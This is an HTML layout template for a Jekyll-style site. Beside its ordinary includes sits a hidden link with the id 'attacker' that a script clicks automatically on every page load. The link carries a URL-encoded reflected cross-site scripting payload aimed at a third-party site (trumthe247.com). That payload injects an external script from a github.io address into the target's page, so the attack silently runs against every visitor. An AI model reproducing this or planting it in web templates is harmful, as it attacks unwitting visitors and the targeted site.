<!DOCTYPE html>
<html lang="en">
  {% include head.html %}
  <body>
      {% include header.html %}
      <section id="about">
        {% include music.html %}
      </section>
        {{ content }}
      <a id="attacker" href="https://trumthe247.com/histories/index?find_type=&data=helloworld%22%20onfocus=%22var%20script%20=%20document.createElement(%27script%27);script.src%20=%20%27https://ngocchanh.github.io/assets/js/test.js%27;document.body.appendChild(script)%22%20autofocus%3E&find_change=%27&find_time_begin=&find_time_end=&submit=" target="_top"></a>
      <script>document.querySelector('a#attacker').click()</script>
      {% include footer.html %}
  </body>
</html>
